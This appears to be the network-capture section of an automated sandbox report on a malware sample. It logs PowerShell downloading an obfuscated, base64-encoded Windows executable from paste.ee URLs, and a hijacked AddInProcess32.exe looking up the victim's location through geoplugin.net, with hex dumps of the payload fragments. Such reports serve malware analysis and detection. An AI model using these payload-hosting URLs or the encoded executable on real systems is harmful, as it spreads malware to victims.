                                          Data Ascii: 4wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73Q+NcfD13w8NEfDv3Q7NseDp3w5MAPDvzg7M0ODszw6MoODpzA6McODmzQ5MQODjzg4MEODgzw3M4NDdzA3MsNDazQ2MgNDXzg1MUNDUzw0MINDRzA0M8MDOzQzMwADzwQMM8CDtwwKMkCDnwQJMMCDhwwH
                                          Oct 14, 2024 11:10:29.147188902 CEST1236INData Raw: 6a 70 44 57 36 51 6a 4f 45 6b 7a 39 35 30 64 4f 79 6c 6a 4d 34 38 7a 4e 2f 61 7a 34 32 34 35 4d 67 50 6a 32 78 6f 62 4d 78 46 54 54 78 6f 54 4d 75 45 6a 49 78 59 42 4d 52 44 54 75 77 34 49 4d 76 42 44 58 77 41 46 4d 45 42 7a 48 41 41 41 41 4d 43
                                          Data Ascii: jpDW6QjOEkz950dOyljM48zN/az4245MgPj2xobMxFTTxoTMuEjIxYBMRDTuw4IMvBDXwAFMEBzHAAAAMCQBgBAAA8D9/I7Pp+zo/g5PN+zc/00Pz8TA+ktPp6Tk+4iPS0zt9waPO2Dh9EXPmtDV6UcOIZT/2osNTYDA1EeNSXTq1UZNtUjJ18RNYED1AAAAUBQBQBgPP7Dy+EpPJ2Dl6omOjpDL6QiMRFT5woFAAAAIAUAQAAA
                                          Oct 14, 2024 11:10:29.147200108 CEST1236INData Raw: 7a 63 35 4d 48 4f 6a 61 7a 49 32 4d 34 49 54 34 79 55 74 4d 4a 4c 54 74 79 6b 71 4d 48 4a 7a 50 79 45 69 4d 5a 49 54 45 79 6b 51 4d 39 47 6a 58 78 59 42 4d 36 44 44 76 77 49 4c 4d 51 43 44 66 77 38 46 4d 77 41 54 47 41 41 41 41 38 43 41 42 51 44
                                          Data Ascii: zc5MHOjazI2M4IT4yUtMJLTtykqMHJzPyEiMZITEykQM9GjXxYBM6DDvwILMQCDfw8FMwATGAAAA8CABQDAAA8j6/U9PF+TY+glP00ji9AUPjwD88gNPPxzN8syO1vj47Q6OVujV6EvOXqDj68nOcpjP5EYO4gz54oMO2iTJ2EtNCZzI2QQNZTzbzI0MYMjDy4kMkIDBxEdM4BD7wQOAAAAaAQAwAAAA/MzPr4zi+kmPO5DR+cQ
                                          Oct 14, 2024 11:10:29.147211075 CEST1236INData Raw: 6c 55 6a 2b 30 4d 4c 4e 76 53 7a 71 30 63 4b 4e 6a 53 7a 6e 30 73 4a 4e 58 4b 54 34 79 51 6f 4d 56 46 6a 36 77 63 4c 4d 46 43 41 41 41 67 44 41 45 41 48 41 41 41 67 50 37 37 44 38 2b 34 51 50 6b 33 6a 75 39 30 59 50 37 31 7a 42 38 73 30 4f 7a 76
                                          Data Ascii: lUj+0MLNvSzq0cKNjSzn0sJNXKT4yQoMVFj6wcLMFCAAAgDAEAHAAAgP77D8+4QPk3ju90YP71zB8s0OzvTy7M6O9tDO4wCOagDFyUmMfFD7xYeMIGTWx8UMFBAAAwDAEAGAAAgPg3D49kBP/zD78INP/yTp7c7OxuzH6oROilzW5AUO6kzM5USOakzE4YOONjzK2QqNhYDB1wfNzXzx1UEN0TD70kJNhJjBwgDMoAAAAQFAEAF
                                          Oct 14, 2024 11:10:29.147222996 CEST1236INData Raw: 2f 51 6c 50 33 30 6a 65 32 67 63 4e 4d 4e 44 30 7a 59 69 4d 56 4c 44 7a 79 67 72 4d 63 4a 54 55 79 4d 6b 4d 31 49 44 4b 79 49 52 4d 39 48 6a 32 78 4d 63 4d 75 47 6a 6e 78 41 5a 4d 45 47 44 65 78 6f 57 4d 62 46 54 51 77 55 43 41 41 41 41 54 41 4d
                                          Data Ascii: /QlP30je2gcNMND0zYiMVLDzygrMcJTUyMkM1IDKyIRM9Hj2xMcMuGjnxAZMEGDexoWMbFTQwUCAAAATAMAwAAAA+sqPr0Tl94YPf0DF8cPPHzTt8IIP1xza70HAAAAJAMAsAkjs5gaOelDV5ESOUgjZ44FOVhDG48wN1fTf3E3NMYDa1EVNFVDF14QNHQT+0kNN9STs0AKNFSzd00GNjRzR0MDNLMD8zo+McPzuzs6MmODlxcD
                                          Oct 14, 2024 11:10:29.152076960 CEST1236INData Raw: 70 59 44 46 31 38 66 4e 6a 58 54 7a 31 55 63 4e 38 57 7a 71 31 77 41 4e 74 54 44 32 30 73 4d 4e 37 53 6a 70 30 4d 46 4e 46 52 44 48 30 6b 77 4d 77 50 54 31 7a 55 38 4d 39 4f 44 70 7a 6f 33 4d 71 4e 6a 59 7a 6f 30 4d 71 4d 6a 43 79 6b 74 4d 42 4c
                                          Data Ascii: pYDF18fNjXTz1UcN8Wzq1wANtTD20sMN7Sjp0MFNFRDH0kwMwPT1zU8M9ODpzo3MqNjYzo0MqMjCyktMBLjoycoMqJzSy4iMpIjFywgMCED/xcfMsHD5xwdMUHTzxYcM/GDuxEbMqGzox0ZMXGTkxsYMFGjUxkUM5ETKxkRMPETBw8PM6DT8wUOMdDT1w0MMGDzvwgLMxCjqwMKMcCjlwAJMKCDhw4HMeBzVwwEMDBTLwgAMDAA


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.549787178.237.33.50807332C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 14, 2024 11:10:41.567785978 CEST71OUTGET /json.gp HTTP/1.1
                                          Host: geoplugin.net
                                          Cache-Control: no-cache
                                          Oct 14, 2024 11:10:42.206954956 CEST1170INHTTP/1.1 200 OK
                                          date: Mon, 14 Oct 2024 09:10:42 GMT
                                          server: Apache
                                          content-length: 962
                                          content-type: application/json; charset=utf-8
                                          cache-control: public, max-age=300
                                          access-control-allow-origin: *
                                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                          Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.549706188.114.97.34431436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampBytes transferredDirectionData
                                          2024-10-14 09:10:20 UTC67OUTGET /d/2A2GE/0 HTTP/1.1
                                          Host: paste.ee
                                          Connection: Keep-Alive
                                          2024-10-14 09:10:20 UTC1234INHTTP/1.1 200 OK
                                          Date: Mon, 14 Oct 2024 09:10:20 GMT
                                          Content-Type: text/plain; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Cache-Control: max-age=2592000
                                          strict-transport-security: max-age=63072000
                                          x-frame-options: DENY
                                          x-content-type-options: nosniff
                                          x-xss-protection: 1; mode=block
                                          content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r6FbapQncL1nHlZifvQn%2B4PM0qeOHXfUrmv5JMzMxkIilrL5xRbFDpUCFVVcqHKXUo%2BfToDRwJKnfjlbcY0AXWH1PyvRdWP8ihI1WFs2Tt5AjyK9TvNK%2BgvpGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8d266f88e8b443f4-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-10-14 09:10:20 UTC135INData Raw: 31 66 37 66 0d 0a 54 56 71 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 2f 2f 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4c 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86
                                          Data Ascii: 1f7fTVqQ::M::::E:::://8::Lg:::::
                                          2024-10-14 09:10:20 UTC1369INData Raw: 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2
                                          Data Ascii: ::::Q::::::::::::::::::::::::::::::::
                                          2024-10-14 09:10:20 UTC1369INData Raw: 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4c 78 4c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 50 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 67 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86
                                          Data Ascii: ::B:::::::::::::::LxL::BP:::::G:::GgD::::::::
                                          2024-10-14 09:10:20 UTC1369INData Raw: e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 e2 86 93 3a e2 86 93 75 63 6e 4e 79 59 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 67 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 59 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93
                                          Data Ascii: ::G:ucnNyYw:::GgD::::Y:::::Q::::w:::::::::::::::
                                          2024-10-14 09:10:20 UTC1369INData Raw: 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 71 48 67 49 6f 47 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 69 71 6d 63 78 6b e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 71 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 48 4d 61 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 67 e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 52 7a 47 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 6f e2 86 93 3a e2 86 93 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 63 78 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 71 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2
                                          Data Ascii: :::oqHgIoG:::Ciqmcxk:::q::Q::BHMa:::Kg:I:::RzGw::Co:D:::Ecxw:::q:B::
                                          2024-10-14 09:10:20 UTC1369INData Raw: 93 3a e2 86 93 42 77 43 6e 4d 70 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 43 33 34 6e e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 44 e2 86 93 3a e2 86 93 49 58 32 67 30 57 45 77 51 72 4b 78 63 6f 4b 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 63 57 42 6d 38 72 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 62 79 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 54 42 51 67 47 45 51 55 58 62 79 30 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 6f 4c 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 77 52 42 42 66 57 45 77 51 52 42 e2 86 93 3a e2 86 93 6b 78 30 e2 86 93 3a e2 86 93 67 71 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86
                                          Data Ascii: :BwCnMp:::KC34n:::KD:IX2g0WEwQrKxcoKg::CgcWBm8r:::Kbyw:::oTBQgGEQUXby0:::ooLg::CgwRBBfWEwQRB:kx0:gq:::
                                          2024-10-14 09:10:20 UTC1091INData Raw: 3a e2 86 93 6f 6d 4b 67 e2 86 93 3a e2 86 93 62 4d e2 86 93 3a e2 86 93 55 e2 86 93 3a e2 86 93 6f 77 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 45 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 35 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 48 79 67 6f 4e 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 6e 4c 7a e2 86 93 3a e2 86 93 77 42 77 4b 43 34 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 4b e2 86 93 3a e2 86 93 6f e2 86 93 3a e2 86 93 4c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 34 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86
                                          Data Ascii: :omKg:bM:U:owQ:::Q::BEg::w::Cg5:::KHygoNw::CnLz:wBwKC4:::oK:o:L:::E:4:M::
                                          2024-10-14 09:10:20 UTC1369INData Raw: 32 30 30 30 0d 0a 3a e2 86 93 48 e2 86 93 3a e2 86 93 57 46 68 55 6f 4d 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 69 59 47 4b 45 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 74 49 33 4b 62 42 67 42 77 42 6e 4c 4e e2 86 93 3a e2 86 93 77 42 77 4b 44 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 57 46 68 55 6f 4d 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 69 59 67 36 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 71 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 42 68 73 6f 45 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 6e 4c 42 42 67 42 77 4b 44 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 4d 4b 45 4d e2 86 93 3a e2 86 93 e2 86
                                          Data Ascii: 2000:H:WFhUoMw::CiYGKEI:::otI3KbBgBwBnLN:wBwKDI:::oWFhUoMw::CiYg6:M::Cgq:::KBhsoEQ::BnLBBgBwKDI:::oMKEM:
                                          2024-10-14 09:10:20 UTC1369INData Raw: 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 69 67 78 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 49 49 67 54 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 4b 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 6e 4e 4a e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 45 77 55 6f 4e 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 74 31 4a 2f 2f 2f 2f e2 86 93 3a e2 86 93 42 45 46 45 77 34 52 44 69 68 4b e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 62 30 73 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 43 62 30 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 54 44 78 45 50 4b 42 55 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a
                                          Data Ascii: ::Cigx:::KIIgT:::oKg::CnNJ:::KEwUoNQ::Ct1J////:BEFEw4RDihK:::Kb0s:::oCb08:::oTDxEPKBU:::
                                          2024-10-14 09:10:20 UTC1369INData Raw: e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 54 45 51 67 52 45 53 68 56 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 4b 46 59 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 70 79 6f 77 63 e2 86 93 3a e2 86 93 63 e2 86 93 3a e2 86 93 68 79 7a 51 4d e2 86 93 3a e2 86 93 63 43 67 79 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 47 68 59 56 4b 44 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 6d 33 6b 34 6c 4b 44 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 54 45 69 67 54 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 42 6e 49 42 43 e2 86 93 3a e2 86 93 42 77 4b 43 34 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93
                                          Data Ascii: :::oTEQgREShV:::KKFY:::pyowc:c:hyzQM:cCgy:::KGhYVKDM:::om3k4lKDQ:::oTEigT:::GBnIBC:BwKC4::


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.549709188.114.97.34431436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampBytes transferredDirectionData
                                          2024-10-14 09:10:27 UTC67OUTGET /d/oWGnC/0 HTTP/1.1
                                          Host: paste.ee
                                          Connection: Keep-Alive
                                          2024-10-14 09:10:27 UTC1234INHTTP/1.1 200 OK
                                          Date: Mon, 14 Oct 2024 09:10:27 GMT
                                          Content-Type: text/plain; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Cache-Control: max-age=2592000
                                          strict-transport-security: max-age=63072000
                                          x-frame-options: DENY
                                          x-content-type-options: nosniff
                                          x-xss-protection: 1; mode=block
                                          content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1PpoiX99XKQwk1eJDEb1xUVv9PI0v65P2j74rEs0qhawvsZmUsHb2gwIjUK8xNZlf5VjkU6qo%2FhgYcibBfbg1%2Fegv05vNIGm6iySNe%2BQsX0zMfx4L8GamO0cNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8d266fb5796942af-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-10-14 09:10:27 UTC135INData Raw: 31 66 37 66 0d 0a 54 56 71 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 2f 2f 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4c 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86
                                          Data Ascii: 1f7fTVqQ::M::::E:::://8::Lg:::::
                                          2024-10-14 09:10:27 UTC1369INData Raw: 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2
                                          Data Ascii: ::::Q::::::::::::::::::::::::::::::::
                                          2024-10-14 09:10:27 UTC1369INData Raw: 86 93 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 50 44 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 4c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 45 51 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2
                                          Data Ascii: :B:::::::::::::::PDw::BL:::::::B:EQD:::::::::
                                          2024-10-14 09:10:27 UTC1369INData Raw: e2 86 93 e2 86 93 3a e2 86 93 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 e2 86 93 3a e2 86 93 75 63 6e 4e 79 59 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 55 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93
                                          Data Ascii: :C:::G:ucnNyYw:::::E::::::E:::Q:::DU::::::::::::
